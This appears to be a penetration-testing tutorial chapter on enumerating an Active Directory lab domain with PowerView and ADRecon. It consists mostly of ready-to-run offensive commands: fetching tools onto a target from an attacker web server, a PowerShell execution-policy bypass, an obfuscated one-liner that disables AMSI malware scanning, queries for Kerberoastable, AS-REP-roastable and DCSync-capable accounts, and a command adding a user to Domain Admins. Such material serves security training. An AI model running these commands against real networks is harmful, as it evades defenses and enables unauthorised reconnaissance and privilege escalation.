This chapter is about running some Powershell scripts to gather information about domains.

PowerView

First we can try to enumerate user configuration user PowerView from PowerrSploit. (https://github.com/PowerShellMafia/PowerSploit)

1. Download the Tool

  • git clone https://github.com/PowerShellMafia/PowerSploit.git
  • cd PowerSploit/Recon
  • ls

2. Transfer the tool to the remote machine, first set a web server in the local machine

  • python3 -m http.server 9999

3. In the remote server using powershell run the following

  • IWR http://192.168.0.16:9999/PowerView.ps1 -OutFile PowerView.ps1
  • dir

4. Import the module to use into Powershell, you’ll probably get execution error so you may need to bypass it

  • powershell -ep bypass
  • Import-Module .\PowerView.ps1

5. Bypass AMSI

  • sET-ItEM ( ‘V’+’aR’ + ‘IA’ + ‘blE:1q2’ + ‘uZx’ ) ( [TYpE]( “{1}{0}”-F’F’,’rE’ ) ) ; ( GeT-VariaBle ( “1Q2U” +”zX” ) -VaL ).”A`ss`Embly”.”GET`TY`Pe”(( “{6}{3}{1}{4}{2}{0}{5}” -f’Util’,’A’,’Amsi’,’.Management.’,’utomation.’,’s’,’System’ ) ).”g`etf`iElD”( ( “{0}{2}{1}” -f’amsi’,’d’,’InitFaile’ ),( “{2}{4}{0}{1}{3}” -f ‘Stat’,’i’,’NonPubli’,’c’,’c,’ )).”sE`T`VaLUE”( ${n`ULl},${t`RuE} )

Domain

1. Get domain info

  • Get domain info
  • Get-NetDomain
  • Get-NetDomain -Domain OSCP-LAB

2. Get Domain Controller

  • Get-NetDomainController -Domain OSCP-LAB

3. Other Domain commands

  • Get-DomainSID #Get domain SID
  • Get-DomainPolicy #Get info about the policy
  • (Get-DomainPolicy).”KerberosPolicy” #Kerberos tickets info(MaxServiceAge)
  • (Get-DomainPolicy).”SystemAccess” #Password policy
  • (Get-DomainPolicy).PrivilegeRights #Check your privileges

4.Display forest

  • Get-DomainGlobalCatalog

Domain Users

1. Now Query all users

  • Get-DomainUser

2. Query a single user

  • Get-DomainUser -Name <username>

3. Search for service accounts (SPN)

  • Get-DomainUser -SPN

4. Get users that belong to a group

  • Get-DomainUser -Properties samaccountname,memberof,descriptions

5. Other user commands

  • Get-NetUser #Get users with several (not all) properties
  • Get-NetUser | select -ExpandProperty samaccountname #List all usernames
  • Get-NetUser -UserName student107 #Get info about a user
  • Get-NetUser -properties name, description #Get all descriptions
  • Get-NetUser -properties name, pwdlastset, logoncount, badpwdcount #Get all pwdlastset, logoncount and badpwdcount
  • Find-UserField -SearchField Description -SearchTerm “built” #Search account with “something” in a parameter

6. Users Filters

  • Get-NetUser -UACFilter NOT_ACCOUNTDISABLE -properties distinguishedname #All enabled users
  • Get-NetUser -UACFilter NOT_ACCOUNTDISABLE | select samaccountname, description, pwdlastset, logoncount, badpwdcount #Basic user enabled info
  • Get-NetUser -UACFilter ACCOUNTDISABLE #All disabled users
  • Get-NetUser -UACFilter SMARTCARD_REQUIRED #Users that require a smart card
  • Get-NetUser -UACFilter NOT_SMARTCARD_REQUIRED -Properties samaccountname #Not smart card users
  • Get-NetUser -LDAPFilter ‘(sidHistory=*)’ #Find users with sidHistory set
  • Get-NetUser -SPN #Kerberoastable users
  • Get-NetUser -PreauthNotRequired #ASREPRoastable users
  • Get-NetUser -SPN | select serviceprincipalname #Kerberoastable users
  • Get-NetUser -SPN | ?{$_.memberof -match ‘Domain Admins’} #Domain admins kerberostable
  • Get-Netuser -TrustedToAuth #Useful for Kerberos constrain delegation
  • Get-NetUser -AllowDelegation -AdminCount #All privileged users that aren’t marked as sensitive/not for delegation
  • # retrieve *most* users who can perform DC replication for dev.testlab.local (i.e. DCsync)
  • Get-ObjectAcl “dc=dev,dc=testlab,dc=local” -ResolveGUIDs | ? {
  • ($_.ObjectType -match ‘replication-get’) -or ($_.ActiveDirectoryRights -match ‘GenericAll’)
  • }

Domain Groups

1. Get AD domain groups

  • Get-DomainGroup

2. Filter by admins

  • Get-DomainGroup -Name “Domain admins”

3. Get members of a AD group

  • Get-DomainGroupMember -Name “Domain admins”
  • Get-DomainGroupMember -Name “Domain admins” -Recurse

4. Filter by domain

  • Get-DomainGroup -Domain “OSCP-LAB”

4. See all AD groups a user is member of

  • Get-DomainGroup -Username “user1”

5. More of group commands

  • Get-NetGroup #Get groups
  • Get-NetGroup | select samaccountname, admincount, description
  • Get-NetGroup -Domain mydomain.local #Get groups of an specific domain
  • Get-NetGroup ‘Domain Admins’ #Get all data of a group
  • Get-NetGroup -AdminCount #Search admin groups
  • Get-NetGroup -UserName “myusername” #Get groups of a user
  • Get-NetGroupMember -Identity “Administrators” –Recurse #Get users inside “Administrators” group. If there are groups inside of this grup, the -Recurse option will print the users inside the others groups also
  • Get-NetGroupMember -Identity “Enterprise Admins” -Domain mydomain.local #Remember that “Enterprise Admins” group only exists in the rootdomain of the forest
  • Get-NetLocalGroup -ComputerName dc.mydomain.local -ListGroups #Get Local groups of a machine (you need admin rights in no DC hosts)
  • Get-NetLocalGroupMember -computername dcorp-dc.dollarcorp.moneycorp.local #Get users of localgroups in computer
  • Get-DomainObjectAcl -SearchBase ‘CN=AdminSDHolder,CN=System,DC=testlab,DC=local’ -ResolveGUIDs #Check AdminSDHolder users
  • Get-DomainObjectAcl -SearchBase ‘CN=AdminSDHolder,CN=System,DC=EGOTISTICAL-BANK,DC=local’ | %{ $_.SecurityIdentifier } | Convert-SidToName #Get AdminSDHolders
  • Get-NetGPOGroup #Get restricted groups

Domain Computers

1. Query all the AD domain computers

  • Get-DomainComputer “OSCP-WinAD-Server.oscp-lab.com”

2. Filter by computer type

  • Get-DomainComputer -OperatingSystem “*2008*”

3. Check for live computers

  • Get-DomainComputer -Ping

4. Filter by computer name

  • Get-DomainComputer -Name “

5. Other computer commands

  • Get-NetComputer #Get all computer objects
  • Get-NetComputer -Ping #Send a ping to check if the computers are working
  • Get-NetComputer -Unconstrained #DCs always appear but aren’t useful for privesc
  • Get-NetComputer -TrustedToAuth #Find computers with Constrined Delegation
  • Get-DomainGroup -AdminCount | Get-DomainGroupMember -Recurse | ?{$_.MemberName -like ‘*$’} #Find any machine accounts in privileged groups
  • Get-NetComputer | select samaccountname, operatingsystem
  • Get-NetComputer -Unconstrained | select samaccountname #DCs always appear but aren’t useful for privesc
  • Get-NetComputer -TrustedToAuth | select samaccountname #Find computers with Constrained Delegation
  • Get-DomainGroup -AdminCount | Get-DomainGroupMember -Recurse | ?{$_.MemberName -like ‘*$’} #Find any machine accounts in privileged groups

Domain Group policy (GPO) & OU

1. Display Group policy object

  • Get-DomainGPO
  • Get-DomainGPO | Select displayname,name

2. Get computer GPO settings

  • Get-DomainGPO -ComputerName <name>
  • Get-DomainGPO -ComputerName <displayname>

3. Get domain ou

  • Get-DomainOU

4. Other commands

  • Get-NetGPO #Get all policies with details
  • Get-NetGPO | select displayname #Get the names of the policies
  • Get-NetGPO -ComputerName <servername> #Get the policy applied in a computer
  • gpresult /V #Get current policy
  • Get-DomainObjectAcl -LDAPFilter ‘(objectCategory=groupPolicyContainer)’ | ? { ($_.SecurityIdentifier -match ‘^S-1-5-.*-[1-9]\d{3,}$’) -and ($_.ActiveDirectoryRights -match ‘WriteProperty|GenericAll|GenericWrite|WriteDacl|WriteOwner’)}
  • Get-NetGPO -GPOName ‘{3E04167E-C2B6-4A9A-8FB7-C811158DC97C}‘ #Get GPO of an OU
  • Get-NetOU #Get Organization Units
  • Get-NetOU StudentMachines | %{Get-NetComputer -ADSPath $_} #Get all computers inside an OU (StudentMachines in this case)

Shares

1. Enumerate shares

  • Find-DomainShare -Verbose

2. Connect to the share

  • cd \\<FQDN or IP>\<sharename>
  • cd \\192.168.0.100\local_share

3. Search readable shares

  • Find-DomainShare -CheckShareAccess

ACL

1. Find the ACL rules associated to a user

  • whoami
  • Get-ObjectAcl -SamAccountName user1 -ResolveGUIDS

2. Find if there is any generic access

  • Get-Object -SamAccountName ‘<Group>’ -ResolveGUIDS | ? { ($_.ActiveDirectoryRights –match ‘GenericWrite ‘) -and ($_.SecurityIdentifier -match ‘<SID>’) }
  • Get-Object -SamAccountName * -ResolveGUIDS | ? { ($_.ActiveDirectoryRights –match ‘GenericWrite ‘) -and ($_.SecurityIdentifier -match ‘<SID>’) }

3. Having write access into a domaingroup allows you to add users to that group

  • Add-DomainGroupMember -Identity ‘Domain Admins’ -Members ‘User1’ –Domain ‘OSCP-LAB’

Other ACL commands

  • Get-PathAcl -Path “\\dc.mydomain.local\sysvol” #Get permissions of a file
  • Find-InterestingDomainAcl -ResolveGUIDs #Find intresting ACEs (Interesting permisions of “unexpected objects” (RID>1000 and modify permissions) over other objects
  • Find-InterestingDomainAcl -ResolveGUIDs | ?{$_.IdentityReference -match “RDPUsers”} #Check if any of the interesting permissions founds is realated to a username/group
  • Get-NetGroupMember -GroupName “Administrators” -Recurse | ?{$_.IsGroup -match “false”} | %{Get-ObjectACL -SamAccountName $_.MemberName -ResolveGUIDs} | select ObjectDN, IdentityReference, ActiveDirectoryRights #Get special rights over All administrators in domain

ADRecon: Active Directory Recon

ADRecon is a tool which extracts and combines various artefacts (as highlighted below) out of an AD environment.

It can be run from any workstation that is connected to the environment, even hosts that are not domain members. Furthermore, the tool can be executed in the context of a non-privileged (i.e. standard domain user) account. Fine Grained Password Policy, LAPS and BitLocker may require Privileged user accounts.

The following information is gathered by the tool:

  • Forest;
  • Domain;
  • Trusts;
  • Sites;
  • Subnets;
  • Default and Fine Grained Password Policy (if implemented);
  • Domain Controllers, SMB versions, whether SMB Signing is supported and FSMO roles;
  • Users and their attributes;
  • Service Principal Names (SPNs);
  • Groups and memberships;
  • Organizational Units (OUs);
  • GroupPolicy objects and gPLink details;
  • DNS Zones and Records;
  • Printers;
  • Computers and their attributes;
  • PasswordAttributes (Experimental);
  • LAPS passwords (if implemented);
  • BitLocker Recovery Keys (if implemented);
  • ACLs (DACLs and SACLs) for the Domain, OUs, Root Containers, GPO, Users, Computers and Groups objects;
  • GPOReport (requires RSAT);
  • Kerberoast (not included in the default collection method); and
  • Domain accounts used for service accounts (requires privileged account and not included in the default collection method).

NOTE: The tool will use Microsoft Remote Server Administration Tools (RSAT) if available, otherwise it will communicate with the Domain Controller using LDAP.

https://github.com/sense-of-security/ADRecon

How to use

1. Download the tool, and start a web server in your local machine

  • git clone https://github.com/sense-of-security/ADRecon.git
  • cd ADRecon
  • ls
  • python3 -m http.server 9999

2. Have the file ADRecon.ps1 transferred to the target machine. I’ll use powershell

  • IWR http://192.168.0.16:9999/ADRecon.ps1 -OutFile ADRecon.ps1
  • dir

3. Start a powershell process with execution bypass, then, execute the script

  • powershell -ep bypass
  • .\ADRecon.ps1 -OutputDir ADRecon_results -OutputType HTML

4. Looking at the directory we can see the script created a directory named ADRecon_results

  • dir
  • cd ADRecon_results
  • dir

5. Into the folder HTML-Files we will see the result of each script

6. You can see different type of results such as

Users

Computers

Domain

Domain Controllers

Groups

DACLs

Password Policy

OUs

Inspect all of them and start gathering information about the domain controller